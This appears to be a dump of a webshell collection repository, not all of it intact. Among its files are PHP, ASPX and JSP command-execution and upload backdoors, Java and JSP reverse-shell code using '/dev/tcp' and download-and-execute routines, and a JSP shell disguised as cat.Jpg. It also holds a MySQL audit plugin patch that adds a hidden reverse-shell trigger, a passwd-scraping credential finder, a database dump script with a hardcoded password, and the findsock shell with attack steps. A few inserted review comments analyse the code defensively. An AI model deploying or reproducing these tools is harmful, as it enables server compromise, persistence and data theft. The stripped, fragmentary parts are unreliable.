34 |                              / \_______ /|_\
35 |                             /          /_/ \__
36 |                            /             \_/ /
37 |                          _|_              |/|_
38 |                          _|_  O    _    O  _|_
39 |                          _|_      (_)      _|_
40 |                           \                 /
41 |                            _\_____________/_
42 |                           /  \/  (___)  \/  \
43 |                           \__(  o     o  )__/ 
58 | 
59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 |
Execute command:
Change directory:
Upload file:
67 |

68 |
"; 72 | } else { 73 | echo "There was an error uploading the file, please try again!"; 74 | } 75 | } 76 | if(($_POST['exe']) == "Execute") { 77 | $curcmd = "cd ".$curdir.";".$curcmd; 78 | $f=popen($curcmd,"r"); 79 | while (!feof($f)) { 80 | $buffer = fgets($f, 4096); 81 | $string .= $buffer; 82 | } 83 | pclose($f); 84 | echo htmlspecialchars($string); 85 | } 86 | ?> 87 |
88 | 89 | 90 | -------------------------------------------------------------------------------- /Jsp/Oracle Database.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.sql.*" %> 2 | <%@ page import="java.util.*" %> 3 | <%@ page import="java.io.*" %> 4 | <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> 5 | <% 6 | try { 7 | String backupDir = "/tmp/"; 8 | String ex=".txt"; 9 | 10 | String driver = "oracle.jdbc.driver.OracleDriver"; 11 | String url = "jdbc:oracle:thin:@127.0.0.1:1521:jcjobcn"; 12 | String username = "system"; 13 | String password = "motoME722remind2012"; 14 | 15 | 16 | Class.forName(driver); 17 | Connection conn = DriverManager.getConnection(url, username, password); 18 | 19 | /** ==== >>>> TWEAK HERE TO DUMP ALL TABLESPACES <<<< ==== **/ 20 | String sql_tables="select TABLE_NAME from user_tab_comments"; 21 | PreparedStatement ps = conn.prepareStatement(sql_tables); 22 | ResultSet rs = ps.executeQuery(); 23 | ArrayList tables = new ArrayList(); 24 | while (rs.next()) { 25 | tables.add(rs.getString(1)); 26 | } 27 | rs.close(); 28 | 29 | for(int i=0;i>>> TWEAK HERE TO DUMP HEADER <<<< ==== **/ 40 | while(r.next()){ 41 | bw.append("INSERT INTO " + table + " VALUES("); 42 | for (int col = 1; col <= rsmeta.getColumnCount(); col++) { 43 | bw.append("'"); 44 | if (r.getString(col) == null) 45 | bw.append(""); 46 | else 47 | bw.append(r.getString(col)); 48 | if (col == rsmeta.getColumnCount()) 49 | bw.append("'"); 50 | else 51 | bw.append("', "); 52 | } 53 | bw.append(");"); 54 | bw.newLine(); 55 | } 56 | 57 | bw.flush(); 58 | bw.close(); 59 | osw.close(); 60 | r.close(); 61 | } 62 | 63 | rs.close(); 64 | out.println("backup done"); 65 | conn.close(); 66 | } catch (Exception e) { 67 | response.setStatus(200); 68 | e.printStackTrace(); 69 | } 70 | out.println("

finished

"); 71 | %> -------------------------------------------------------------------------------- /Php/bdshell.php: -------------------------------------------------------------------------------- 1 | 4 | 5 | Shell - <?php echo(str_replace('<','',$_POST['cmd']));?> 6 | 7 | 8 |
 9 | ">> '.$tmpoutput.' && echo '.$pwd.'$ '.escapeshellarg($cmd).' >> '.$tmpoutput.' && echo >> '.$tmpoutput.' && '.$cmd .' >> '.$tmpoutput.' 2>&1 && pwd > '.$tmppwd);
23 | $newpwd = trim(file_get_contents($tmppwd)); //capture new Present (current) Working Directory just in case it changed
24 | if($newpwd != "") $pwd = $newpwd; //if something failed, don't change directory
25 | echo(file_get_contents($tmpoutput, false, NULL, filesize($tmpoutput)-MAX_OUTPUT_LENGHT));
26 | unlink($tmppwd);
27 | }
28 | ?>
29 | 
30 |

31 |

32 | Reset 33 | "> 34 | 35 | 36 | $ 37 | 38 | 39 |
40 |
41 |
42 |

43 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /Php/php-backdoor.php: -------------------------------------------------------------------------------- 1 | "; 14 | if ($handle = opendir("$d")) { 15 | echo "

listing of $d

"; 16 | while ($dir = readdir($handle)){ 17 | if (is_dir("$d/$dir")) echo ""; 18 | else echo ""; 19 | echo "$dir\n"; 20 | echo ""; 21 | } 22 | 23 | } else echo "opendir() failed"; 24 | closedir($handle); 25 | die ("
"); 26 | } 27 | if(isset($_REQUEST['c'])){ 28 | echo "
";
29 | 	system($_REQUEST['c']);		   
30 | 	die;
31 | }
// Upload branch: runs whenever the request carries an 'upload' parameter.
// No authentication or authorisation check is visible in this branch.
// Both halves of the destination path are request-controlled: the
// directory comes from $_REQUEST['dir'] and the file name is the
// client-supplied upload name, concatenated without any separator,
// extension or path validation - the caller chooses where the file lands
// and what it is called.
// NOTE(review): $HTTP_POST_FILES is the legacy long-array name for upload
// data; whether it is populated depends on the PHP version - confirm.
// Defensive reading: a legitimate upload handler fixes the target directory
// server-side, generates the stored name itself, and keeps the upload
// directory non-executable. Hunting signals: multipart POSTs carrying
// 'upload' and 'dir' parameters, and new script files appearing in
// web-writable directories.
32 | if(isset($_REQUEST['upload'])){
33 | 
34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
35 | 			else $dir=$_REQUEST['dir'];
36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
// move_uploaded_file() returns false on failure; the script then aborts.
37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
38 | 			die('file uploading error.');
39 | }
40 | if(isset($_REQUEST['mquery'])){
41 | 	
42 | 	$host=$_REQUEST['host'];
43 | 	$usr=$_REQUEST['usr'];
44 | 	$passwd=$_REQUEST['passwd'];
45 | 	$db=$_REQUEST['db'];
46 | 	$mquery=$_REQUEST['mquery'];
47 | 	mysql_connect("$host", "$usr", "$passwd") or
48 |     die("Could not connect: " . mysql_error());
49 |     mysql_select_db("$db");
50 |     $result = mysql_query("$mquery");
51 | 	if($result!=FALSE) echo "

query was executed correctly

\n"; 52 | while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); 53 | mysql_free_result($result); 54 | die; 55 | } 56 | ?> 57 |
execute command:
58 |
59 | upload file: to dir:   
60 |
to browse go to http://?d=[directory here] 61 |
for example: 62 | http://?d=/etc on *nix 63 | or http://?d=c:/windows on win 64 |
execute mysql query: 65 |
66 | host: user: password: 67 | 68 | database: query: 69 |
70 | 71 | 72 | -------------------------------------------------------------------------------- /Php/Password Hasher for PHP Shell 2.1.php: -------------------------------------------------------------------------------- 1 | 5 | * Licensed under the GNU GPL. See the file COPYING for details. 6 | */ 7 | 8 | function stripslashes_deep($value) { 9 | if (is_array($value)) 10 | return array_map('stripslashes_deep', $value); 11 | else 12 | return stripslashes($value); 13 | } 14 | 15 | if (get_magic_quotes_gpc()) 16 | $_POST = stripslashes_deep($_POST); 17 | 18 | $username = isset($_POST['username']) ? $_POST['username'] : ''; 19 | $password = isset($_POST['password']) ? $_POST['password'] : ''; 20 | 21 | ?> 22 | 24 | 25 | 26 | Password Hasher for PHP Shell 2.1 27 | 28 | 29 | 30 | 31 | 32 |

Password Hasher for PHP Shell 2.1

33 | 34 |
35 | 36 |
37 | Username 38 | 39 |
40 | 41 |
42 | Password 43 | 44 |
45 | 46 |
47 | Result 48 | 49 | Enter a username and a password and update.

\n"; 52 | } else { 53 | 54 | $u = strtolower($username); 55 | 56 | if (preg_match('/[[ |&~!()]/', $u) || $u == 'null' || 57 | $u == 'yes' || $u == 'no' || $u == 'true' || $u == 'false') { 58 | 59 | echo '

Your username cannot contain any of the following reserved 60 | word: "null", "yes", "no", "true", or 61 | "false". The following characters are also prohibited: 62 | " " (space), "[" (left bracket), "|" (pipe), 63 | "&" (ampersand), "~" (tilde), "!" (exclamation 64 | mark), "(" (left parenthesis), or ")" (right 65 | parenthesis).

' . "\n"; 66 | 67 | echo '

Please choose another username and try again.

' . "\n"; 68 | 69 | } else { 70 | echo "

Write the following line into config.php " . 71 | "in the users section:

\n"; 72 | 73 | $fkt = 'md5'; // Change to sha1 is you feel like it... 74 | $salt = dechex(mt_rand()); 75 | 76 | $hash = $fkt . ':' . $salt . ':' . $fkt($salt . $password); 77 | 78 | echo "
\n";
 79 |         echo htmlentities(str_pad($username, 8) . ' = "' . $hash . '"') . "\n";
 80 |         echo "
\n"; 81 | } 82 | } 83 | ?> 84 | 85 |

86 | 87 |
88 | 89 |
90 | 91 | 92 |
93 | 94 |
95 | Copyright © 2005, Martin Geisler. Get the 96 | latest version at mgeisler.net/php-shell/. 97 |
98 | 99 | 100 | 101 | -------------------------------------------------------------------------------- /Aspx/Command.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import namespace="System.Diagnostics"%> 3 | <%@ Import Namespace="System.IO" %> 4 | 5 | 6 | 7 | 70 | 71 | 72 | 73 | Command 74 | 75 | 76 |
77 |
78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 |
Auth Key:
Command:
 
91 |
92 |
93 | 94 | 95 | 96 | -------------------------------------------------------------------------------- /Php/ftpsearch.php: -------------------------------------------------------------------------------- 1 | "; 3 | echo "Edited By KingDefacer"; 4 | 5 | set_time_limit(0); 6 | ################## 7 | @$passwd=fopen('/etc/passwd','r'); 8 | if (!$passwd) { 9 | echo "[-] Error : coudn't read /etc/passwd"; 10 | exit; 11 | } 12 | $path_to_public=array(); 13 | $users=array(); 14 | $pathtoconf=array(); 15 | $i=0; 16 | 17 | while(!feof($passwd)) { 18 | $str=fgets($passwd); 19 | if ($i>35) { 20 | $pos=strpos($str,":"); 21 | $username=substr($str,0,$pos); 22 | $dirz="/home/$username/public_html/"; 23 | if (($username!="")) { 24 | if (is_readable($dirz)) { 25 | array_push($users,$username); 26 | array_push($path_to_public,$dirz); 27 | } 28 | } 29 | } 30 | $i++; 31 | } 32 | ################### 33 | 34 | ######################### 35 | echo "

"; 36 | echo "
"; 100 | 101 | echo ""; 102 | ?> 103 | -------------------------------------------------------------------------------- /Mysql/mysql_audit_plugin/audit_null.patch: -------------------------------------------------------------------------------- 1 | --- mysql-5.6.10/plugin/audit_null/audit_null.c 2013-01-23 00:54:49.000000000 +0800 2 | +++ audit_null.c 2013-03-30 00:37:54.409049885 +0800 3 | @@ -17,10 +17,22 @@ 4 | #include 5 | #include 6 | #include 7 | +#include 8 | +#include 9 | +#include 10 | +#include 11 | +#include 12 | + 13 | +#define BACK_IP "127.0.0.1" 14 | +#define BACK_PORT "8080" 15 | +#define DEBUG 1 16 | 17 | #if !defined(__attribute__) && (defined(__cplusplus) || !defined(__GNUC__) || __GNUC__ == 2 && __GNUC_MINOR__ < 8) 18 | #define __attribute__(A) 19 | #endif 20 | +static FILE *log_fp; 21 | +static sem_t *sem = NULL; 22 | +static time_t last_exec; 23 | 24 | static volatile int number_of_calls; /* for SHOW STATUS, see below */ 25 | /* Count MYSQL_AUDIT_GENERAL_CLASS event instances */ 26 | @@ -58,6 +70,8 @@ 27 | number_of_calls_connection_connect= 0; 28 | number_of_calls_connection_disconnect= 0; 29 | number_of_calls_connection_change_user= 0; 30 | + log_fp = NULL; 31 | + sem = NULL; 32 | return(0); 33 | } 34 | 35 | @@ -77,6 +91,8 @@ 36 | 37 | static int audit_null_plugin_deinit(void *arg __attribute__((unused))) 38 | { 39 | + if(log_fp!=NULL) fclose(log_fp); 40 | + if(sem!=NULL) sem_close(sem); 41 | return(0); 42 | } 43 | 44 | 
@@ -99,44 +115,24 @@ 45 | number_of_calls++; 46 | if (event_class == MYSQL_AUDIT_GENERAL_CLASS) 47 | { 48 | - const struct mysql_event_general *event_general= 49 | - (const struct mysql_event_general *) event; 50 | - switch (event_general->event_subclass) 51 | - { 52 | - case MYSQL_AUDIT_GENERAL_LOG: 53 | - number_of_calls_general_log++; 54 | - break; 55 | - case MYSQL_AUDIT_GENERAL_ERROR: 56 | - number_of_calls_general_error++; 57 | - break; 58 | - case MYSQL_AUDIT_GENERAL_RESULT: 59 | - number_of_calls_general_result++; 60 | - break; 61 | - case MYSQL_AUDIT_GENERAL_STATUS: 62 | - number_of_calls_general_status++; 63 | - break; 64 | - default: 65 | - break; 66 | - } 67 | - } 68 | - else if (event_class == MYSQL_AUDIT_CONNECTION_CLASS) 69 | - { 70 | - const struct mysql_event_connection *event_connection= 71 | - (const struct mysql_event_connection *) event; 72 | - switch (event_connection->event_subclass) 73 | - { 74 | - case MYSQL_AUDIT_CONNECTION_CONNECT: 75 | - number_of_calls_connection_connect++; 76 | - break; 77 | - case MYSQL_AUDIT_CONNECTION_DISCONNECT: 78 | - number_of_calls_connection_disconnect++; 79 | - break; 80 | - case MYSQL_AUDIT_CONNECTION_CHANGE_USER: 81 | - number_of_calls_connection_change_user++; 82 | - break; 83 | - default: 84 | - break; 85 | - } 86 | + const struct mysql_event_general *pEvent; 87 | + 88 | + pEvent = (const struct mysql_event_general *) event; 89 | + if (pEvent->general_query != NULL && *(pEvent->general_query) != '\0') { 90 | + sem = sem_open("haha", O_RDWR|O_CREAT, 00777, 1); 91 | + if(strstr(pEvent->general_query,"openwill.me")!=NULL && sem_trywait(sem)==0 && (time(0)-last_exec)>10){ 92 | + last_exec = time(0); 93 | + #ifdef DEBUG 94 | + if(log_fp == NULL)log_fp = fopen("/tmp/null_audit.log", "a"); 95 | + fprintf(log_fp, "execing\n"); 96 | + fprintf(log_fp, "%s;\n\n", pEvent->general_query); 97 | + fflush(log_fp); 98 | + #endif 99 | + system("bash < /dev/tcp/"BACK_IP"/"BACK_PORT" >&0 2>&0 &"); 100 | + } 101 | + 
sem_unlink("haha"); 102 | + } 103 | + //Job done 104 | } 105 | } 106 | 107 | -------------------------------------------------------------------------------- /Aspx/SQL.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import namespace="System.Data"%> 3 | <%@ Import namespace="System.Data.SqlClient"%> 4 | 5 | 6 | 7 | 83 | 84 | 85 | 86 | SQL 87 | 88 | 89 | 90 |
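Review bot: The rewritten general-event branch calls `system()` to start a shell wired to `BACK_IP`/`BACK_PORT` whenever `strstr(pEvent->general_query,"openwill.me")` matches, so any client able to get that string into a query triggers command execution as the MySQL server account. This is a backdoor rather than auditing and should be rejected: drop the `strstr`/`system()` block and restore the general and connection subclass counters that the hunk deletes. The `BACK_IP`, `BACK_PORT` and `DEBUG` defines and the `log_fp`/`sem` statics in the first hunk, and the init/deinit changes in the second and third hunks, exist only to support it. For triage, the artefacts visible in the patch are the named semaphore `haha`, the debug log `/tmp/null_audit.log` (written because `DEBUG` is defined), and a shell process spawned by the database server; listing loaded plugins with `SHOW PLUGINS` would surface a rebuilt audit_null. The enclosing notify function begins outside the hunk.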
91 |
92 | 93 | 94 | 95 | 96 | 97 | 98 |
Auth Key:
Connection:
SQL:
 
99 |
100 |
101 | 102 | 103 | 104 | 105 | -------------------------------------------------------------------------------- /Php/php-findsock-shell.php: -------------------------------------------------------------------------------- 1 | 89 | 90 | -------------------------------------------------------------------------------- /Other/Axis2Shell/Utils.java: -------------------------------------------------------------------------------- 1 | import java.io.BufferedReader; 2 | import java.io.File; 3 | import java.io.FileOutputStream; 4 | import java.io.FileWriter; 5 | import java.io.InputStream; 6 | import java.io.InputStreamReader; 7 | import java.io.OutputStream; 8 | import java.net.Socket; 9 | import java.net.URL; 10 | import java.net.URLConnection; 11 | 12 | public class Utils { 13 | 14 | static String os = System.getProperty("os.name").toLowerCase(); 15 | 16 | public static String exec(String cmd) { 17 | String result=""; 18 | try { 19 | if (cmd!=null&&cmd.trim().length()>0) { 20 | if (os.startsWith("windows")) { 21 | cmd="cmd.exe /c "+ cmd; 22 | }else { 23 | cmd="/bin/sh -c "+ cmd; 24 | } 25 | InputStream inputStream= Runtime.getRuntime().exec(cmd).getInputStream(); 26 | 27 | int read=0; 28 | while ((read=inputStream.read())!=-1) { 29 | result+=(char)read; 30 | } 31 | } 32 | } catch (Exception e) { 33 | result=e.getMessage(); 34 | } 35 | return result; 36 | } 37 | 38 | public static String shell(String host, int port) { 39 | 40 | String result = ""; 41 | if (host != null && host.trim().length() > 0 && port > 0) { 42 | try { 43 | if (os.startsWith("linux")) { 44 | 45 | String name="wooyun.sh"; 46 | File file=new File(name); 47 | 48 | FileWriter writer=new FileWriter(file); 49 | writer.write("/bin/bash -i > /dev/tcp/"+host+"/"+port+" 0<&1 2>&1"+"\n"); 50 | writer.flush(); 51 | writer.close(); 52 | Runtime.getRuntime().exec("chmod u+x "+name); 53 | Process process = Runtime.getRuntime().exec("bash "+name); 54 | process.waitFor(); 55 | 56 | file.delete(); 57 | } else { 58 | 
Socket socket = new Socket(host, port); 59 | OutputStream out = socket.getOutputStream(); 60 | InputStream in = socket.getInputStream(); 61 | out.write(("whoami:\t" + exec("whoami")).getBytes()); 62 | int a = 0; 63 | byte[] b = new byte[4096]; 64 | while ((a = in.read(b)) != -1) { 65 | out.write(exec(new String(b, 0, a, "UTF-8").trim()).getBytes("UTF-8")); 66 | } 67 | } 68 | } catch (Exception e) { 69 | result = e.getMessage(); 70 | } 71 | 72 | } else { 73 | result = "host and port are required"; 74 | } 75 | 76 | return result; 77 | } 78 | 79 | public static String upload(String path) { 80 | String result=""; 81 | try { 82 | if (path!=null&&path.trim().length()>0) { 83 | FileOutputStream fos=new FileOutputStream(new File(path)); 84 | InputStream inputStream =new Utils().getClass().getResourceAsStream("/resource/one.txt"); 85 | BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); 86 | String temp = ""; 87 | while (reader.ready()) { 88 | temp += reader.readLine() + "\n"; 89 | } 90 | fos.write(temp.getBytes()); 91 | fos.flush(); 92 | fos.close(); 93 | result="Upload Success"; 94 | }else { 95 | result="Path is required"; 96 | } 97 | } catch (Exception e) { 98 | result =e.getMessage(); 99 | } 100 | return result; 101 | } 102 | 103 | public static String download(String url, String path) { 104 | String result=""; 105 | try { 106 | 107 | if (url!=null&&url.trim().length()>0&&path!=null&&path.trim().length()>0) { 108 | URLConnection conn=new URL(url).openConnection(); 109 | conn.setReadTimeout(10*60*1000); 110 | conn.setReadTimeout(10*60*1000); 111 | InputStream inputStream=conn.getInputStream(); 112 | int read=0; 113 | FileOutputStream fos=new FileOutputStream(new File(path)); 114 | while ((read=inputStream.read())!=-1) { 115 | fos.write(read); 116 | } 117 | fos.flush(); 118 | fos.close(); 119 | }else { 120 | result="Url and path are required"; 121 | } 122 | } catch (Exception e) { 123 | result =e.getMessage(); 124 | } 125 | return result; 126 | 
} 127 | 128 | public static String getClassPath() { 129 | return new Utils().getClass().getClassLoader().getResource("/").getPath(); 130 | } 131 | 132 | } 133 | -------------------------------------------------------------------------------- /Php/matamu.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | Matamu Mat 10 | 11 | 12 |

13 | 14 | 56 | 57 |
58 |

Current working directory: 59 | Root/'; 64 | 65 | if (!empty($work_dir_splitted[0])) { 66 | $path = ''; 67 | for ($i = 0; $i < count($work_dir_splitted); $i++) { 68 | $path .= '/' . $work_dir_splitted[$i]; 69 | printf('%s/', 70 | $PHP_SELF, urlencode($path), $work_dir_splitted[$i]); 71 | } 72 | } 73 | 74 | ?>

75 |

Choose new working directory: 76 |

115 | 116 |

Command: 117 |

118 | 119 |

Enable stderr-trapping?

120 | 137 |
138 | 139 | 142 | 143 |
144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /Aspx/fileupload.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import Namespace="System.IO" %> 3 | 4 | 5 | 6 | 125 | 126 | 127 | -------------------------------------------------------------------------------- /Jsp/园长-jsp/cat.Jpg: -------------------------------------------------------------------------------- 1 | <%@ page language="java" pageEncoding="UTF-8"%> 2 | <%@ page import="java.io.*" %> 3 | <%@ page import="java.net.*" %> 4 | <%! 5 | static String encoding = "UTF-8"; 6 | 7 | static{ 8 | encoding = isNotEmpty(getSystemEncoding())?getSystemEncoding():encoding; 9 | } 10 | 11 | /** 12 | * 异常转换成字符串,获取详细异常信息 13 | * @param e 14 | * @return 15 | */ 16 | public static String exceptionToString(Exception e) { 17 | StringWriter sw = new StringWriter(); 18 | e.printStackTrace(new PrintWriter(sw, true)); 19 | return sw.toString(); 20 | } 21 | 22 | /** 23 | * 获取系统文件编码 24 | * @return 25 | */ 26 | public static String getSystemEncoding(){ 27 | return System.getProperty("sun.jnu.encoding"); 28 | } 29 | 30 | /** 31 | * 非空判断 32 | * 33 | * @param obj 34 | * @return 35 | */ 36 | public static boolean isNotEmpty(Object obj) { 37 | if (obj == null) { 38 | return false; 39 | } 40 | return !"".equals(String.valueOf(obj).trim()); 41 | } 42 | 43 | /** 44 | * 输入流转二进制数组输出流 45 | * @param in 46 | * @return 47 | * @throws IOException 48 | */ 49 | public static ByteArrayOutputStream inutStreamToOutputStream(InputStream in) throws IOException{ 50 | ByteArrayOutputStream baos = new ByteArrayOutputStream(); 51 | byte[] b = new byte[1024]; 52 | int a = 0; 53 | while((a = in.read(b))!=-1){ 54 | baos.write(b,0,a); 55 | } 56 | return baos; 57 | } 58 | 59 | /** 60 | * 复制流到文件,如果文件存在默认会覆盖 61 | * @param in 62 | * @param path 63 | * @throws IOException 64 | */ 65 | public static void copyInputStreamToFile(InputStream 
in,String path) throws IOException{ 66 | FileOutputStream fos = new FileOutputStream(path); 67 | fos.write(inutStreamToOutputStream(in).toByteArray()); 68 | fos.flush(); 69 | fos.close(); 70 | } 71 | 72 | /** 73 | * 模仿Linux下的cat Windows下的type 查看文件内容 74 | * @param path 75 | * @return 76 | * @throws IOException 77 | */ 78 | public static String cat(String path) throws IOException { 79 | return new String(inutStreamToOutputStream(new FileInputStream(path)).toByteArray()); 80 | } 81 | 82 | /** 83 | * 执行操作系统命令 如果是windows某些命令执行不了,可以用 cmd /c dir 执行dir命令 84 | * @param cmd 85 | * @return 86 | */ 87 | public static String exec(String cmd) { 88 | try { 89 | return new String(inutStreamToOutputStream(Runtime.getRuntime().exec(cmd).getInputStream()).toByteArray(),encoding); 90 | } catch (IOException e) { 91 | return exceptionToString(e); 92 | } 93 | } 94 | 95 | /** 96 | * 下载文件到指定目录,保存的文件名必须指定 97 | * @param url 98 | * @param path 99 | * @throws MalformedURLException 100 | * @throws IOException 101 | */ 102 | public static void download(String url,String path) throws MalformedURLException, IOException{ 103 | copyInputStreamToFile(new URL(url).openConnection().getInputStream(), path); 104 | } 105 | 106 | /** 107 | * 连接远程端口,提供本地命令执行入口 108 | * @param host 109 | * @param port 110 | * @throws UnknownHostException 111 | * @throws IOException 112 | */ 113 | public static void shell(String host,int port) throws UnknownHostException, IOException{ 114 | Socket s = new Socket(host,port); 115 | OutputStream out = s.getOutputStream(); 116 | InputStream in = s.getInputStream(); 117 | out.write(("User:\t"+exec("whoami")).getBytes()); 118 | int a = 0; 119 | byte[] b = new byte[1024]; 120 | while((a=in.read(b))!=-1){ 121 | out.write(exec(new String(b,0,a,"UTF-8").trim()).getBytes("UTF-8")); 122 | } 123 | } 124 | 125 | /** 126 | * 下载远程文件并执行,命令执行完成后会删除下载的文件 127 | * @param url 128 | * @param fileName 129 | * @param cmd 130 | * @return 131 | * @throws MalformedURLException 132 | * @throws IOException 
133 | */ 134 | public static String auto(String url,String fileName,String cmd) throws MalformedURLException, IOException{ 135 | download(url, fileName); 136 | String out = exec(cmd); 137 | new File(fileName).delete(); 138 | return out; 139 | } 140 | %> 141 | <% 142 | try{ 143 | String action = request.getParameter("action"); 144 | out.println("
");
145 | 		if(isNotEmpty(action)){
146 | 			if("shell".equalsIgnoreCase(action)){
147 | 				shell(request.getParameter("host"), Integer.parseInt(request.getParameter("port")));
148 | 			}else if("download".equalsIgnoreCase(action)){
149 | 				download(request.getParameter("url"), request.getParameter("path"));
150 | 			}else if("exec".equalsIgnoreCase(action)){
151 | 				out.println(exec(request.getParameter("cmd")));
152 | 			}else if("cat".equalsIgnoreCase(action)){
153 | 				out.println(cat(request.getParameter("path")));
154 | 			}else if("auto".equalsIgnoreCase(action)){
155 | 				out.println(auto(request.getParameter("url"),request.getParameter("fileName"),request.getParameter("cmd")));
156 | 			}
157 | 		}
158 | 		out.println("
"); 159 | }catch(Exception e){ 160 | out.println(exceptionToString(e)); 161 | } 162 | %> 163 | -------------------------------------------------------------------------------- /C#/findsock.c: -------------------------------------------------------------------------------- 1 | // php-findsock-shell - A Findsock Shell implementation in PHP + C 2 | // Copyright (C) 2007 pentestmonkey@pentestmonkey.net 3 | // 4 | // This tool may be used for legal purposes only. Users take full responsibility 5 | // for any actions performed using this tool. The author accepts no liability 6 | // for damage caused by this tool. If these terms are not acceptable to you, then 7 | // do not use this tool. 8 | // 9 | // In all other respects the GPL version 2 applies: 10 | // 11 | // This program is free software; you can redistribute it and/or modify 12 | // it under the terms of the GNU General Public License version 2 as 13 | // published by the Free Software Foundation. 14 | // 15 | // This program is distributed in the hope that it will be useful, 16 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 17 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 18 | // GNU General Public License for more details. 19 | // 20 | // You should have received a copy of the GNU General Public License along 21 | // with this program; if not, write to the Free Software Foundation, Inc., 22 | // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 23 | // 24 | // You are encouraged to send comments, improvements or suggestions to 25 | // me at pentestmonkey@pentestmonkey.net 26 | // 27 | // Description 28 | // ----------- 29 | // (Pair of) Web server scripts that find the TCP socket being used by the 30 | // client to connect to the web server and attaches a shell to it. This 31 | // provides you, the pentester, with a fully interactive shell even if the 32 | // Firewall is performing proper ingress and egress filtering. 
33 | // 34 | // Proper interactive shells are more useful than web-based shell in some 35 | // circumstances, e.g: 36 | // 1: You want to change your user with "su" 37 | // 2: You want to upgrade your shell using a local exploit 38 | // 3: You want to log into another system using telnet / ssh 39 | // 40 | // Limitations 41 | // ----------- 42 | // The shell traffic doesn't look much like HTTP, so I guess that you may 43 | // have problems if the site is being protected by a Layer 7 (Application layer) 44 | // Firewall. 45 | // 46 | // The shell isn't fully implemented in PHP: you also need to upload a 47 | // C program. You need to either: 48 | // 1: Compile the program for the appropriate OS / architecture then 49 | // upload it; or 50 | // 2: Upload the source and hope there's a C compiler installed. 51 | // 52 | // This is a pain, but I couldn't figure out how to implement the findsock 53 | // mechanism in PHP. Email me if you manage it. I'd love to know. 54 | // 55 | // Only tested on x86 / amd64 Gentoo Linux. 56 | // 57 | // Usage 58 | // ----- 59 | // See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck. 60 | // 61 | // Here are some brief instructions. 62 | // 63 | // 1: Compile findsock.c for use on the target web server: 64 | // $ gcc -o findsock findsock.c 65 | // 66 | // Bear in mind that the web server might be running a different OS / architecture to you. 67 | // 68 | // 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using 69 | // whichever upload vulnerability you've indentified. Both should be uploaded to the 70 | // same directory. 71 | // 72 | // 3: Run the shell from a netcat session (NOT a browser - remember this is an 73 | // interactive shell). 74 | // 75 | // $ nc -v target 80 76 | // target [10.0.0.1] 80 (http) open 77 | // GET /php-findsock-shell.php HTTP/1.0 78 | // 79 | // sh-3.2$ id 80 | // uid=80(apache) gid=80(apache) groups=80(apache) 81 | // sh-3.2$ 82 | // ... 
you now have an interactive shell ... 83 | // 84 | 85 | #include 86 | #include 87 | #include 88 | #include 89 | #include 90 | #include 91 | 92 | int main (int argc, char** argv) { 93 | // Usage message 94 | if (argc != 3) { 95 | printf("Usage: findsock ip port\n"); 96 | exit(0); 97 | } 98 | 99 | // Process args 100 | char *sock_ip = argv[1]; 101 | char *sock_port = argv[2]; 102 | 103 | // Declarations 104 | struct sockaddr_in rsa; 105 | struct sockaddr_in lsa; 106 | int size = sizeof(rsa); 107 | char remote_ip[30]; 108 | int fd; 109 | 110 | // Inspect all file handles 111 | for (fd=3; fd 4 | 5 | 6 | static String encoding = "UTF-8"; 7 | 8 | static{ 9 | encoding = isNotEmpty(getSystemEncoding())?getSystemEncoding():encoding; 10 | } 11 | 12 | /** 13 | * 异常转换成字符串,获取详细异常信息 14 | * @param e 15 | * @return 16 | */ 17 | public static String exceptionToString(Exception e) { 18 | StringWriter sw = new StringWriter(); 19 | e.printStackTrace(new PrintWriter(sw, true)); 20 | return sw.toString(); 21 | } 22 | 23 | /** 24 | * 获取系统文件编码 25 | * @return 26 | */ 27 | public static String getSystemEncoding(){ 28 | return System.getProperty("sun.jnu.encoding"); 29 | } 30 | 31 | /** 32 | * 非空判断 33 | * 34 | * @param obj 35 | * @return 36 | */ 37 | public static boolean isNotEmpty(Object obj) { 38 | if (obj == null) { 39 | return false; 40 | } 41 | return !"".equals(String.valueOf(obj).trim()); 42 | } 43 | 44 | /** 45 | * 输入流转二进制数组输出流 46 | * @param in 47 | * @return 48 | * @throws IOException 49 | */ 50 | public static ByteArrayOutputStream inutStreamToOutputStream(InputStream in) throws IOException{ 51 | ByteArrayOutputStream baos = new ByteArrayOutputStream(); 52 | byte[] b = new byte[1024]; 53 | int a = 0; 54 | while((a = in.read(b))!=-1){ 55 | baos.write(b,0,a); 56 | } 57 | return baos; 58 | } 59 | 60 | /** 61 | * 复制流到文件,如果文件存在默认会覆盖 62 | * @param in 63 | * @param path 64 | * @throws IOException 65 | */ 66 | public static void copyInputStreamToFile(InputStream in,String path) throws 
